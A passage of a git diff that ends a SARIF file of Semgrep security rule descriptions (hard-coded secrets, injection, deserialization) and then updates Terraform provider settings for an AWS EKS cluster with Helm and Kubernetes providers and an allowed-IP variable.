and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","id":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","name":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","id":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","name":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","id":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","name":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","id":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","name":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"help":{"markdown":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.require-request.require-request)\n - [https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it](https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it)\n","text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"helpUri":"https://semgrep.dev/r/javascript.express.security.require-request.require-request","id":"javascript.express.security.require-request.require-request","name":"javascript.express.security.require-request.require-request","properties":{"precision":"very-high","tags":["CWE-706: Use of Incorrectly-Resolved Name or Reference","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.require-request.require-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","id":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","name":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","id":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","name":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","id":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","name":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","id":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","name":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib","id":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","name":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.code.tainted-code-stdlib.tainted-code-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","id":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","name":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/marshal.html](https://docs.python.org/3/library/marshal.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","id":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","name":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid"}}],"semanticVersion":"1.96.0"}}}],"$schema":"https://docs.oasis-open.org/sarif/sarif/v2.1.0/os/schemas/sarif-schema-2.1.0.json"} \ No newline at end of file diff --git a/terraform/terraform.tf b/terraform/terraform.tf index 4fe5c4c..3dc2a1a 100644 --- a/terraform/terraform.tf +++ b/terraform/terraform.tf @@ -2,7 +2,15 @@ terraform { required_providers { aws = { source = "hashicorp/aws" - version = "~> 5.0" + version = ">= 5.34.0" + } + helm = { + source = "hashicorp/helm" + version = ">= 2.12.1" + } + kubernetes = { + source = "hashicorp/kubernetes" + version = ">= 2.24.0" } random = { @@ -19,7 +27,34 @@ terraform { source = "hashicorp/cloudinit" version = "~> 2.3.2" } + + time = { + source = "hashicorp/time" + version = "~> 0.13.0" + } } - required_version = "~> 1.3" + required_version = ">= 1.2.0" +} + +provider "kubernetes" { + host = module.eks.cluster_endpoint + cluster_ca_certificate = base64decode(module.eks.cluster_certificate_authority_data) + exec { + api_version = "client.authentication.k8s.io/v1beta1" + command = "aws" + args = ["eks", "get-token", "--cluster-name", module.eks.cluster_name] + } +} + +provider "helm" { + kubernetes { + host = module.eks.cluster_endpoint + cluster_ca_certificate = base64decode(module.eks.cluster_certificate_authority_data) + exec { + api_version = "client.authentication.k8s.io/v1beta1" + command = "aws" + args = ["eks", "get-token", "--cluster-name", module.eks.cluster_name] + } + } } \ No newline at end of file diff --git a/terraform/terraform.tfvars.example b/terraform/terraform.tfvars.example new file mode 100644 index 0000000..a12ebed --- /dev/null +++ b/terraform/terraform.tfvars.example @@ -0,0 +1 @@ +allowed_ip = "123.45.67.890/32" \ No newline at end of file diff --git a/terraform/variables.tf b/terraform/variables.tf index dcaf274..a9dae59 100644 --- a/terraform/variables.tf +++ b/terraform/variables.tf @@ -2,4 +2,9 @@ variable "region" { description = "AWS region" type = string default = "us-east-1" +} + +variable "allowed_ip" { + description = "IP address allowed to access the ingress controller" + type = string } \ No newline at end of file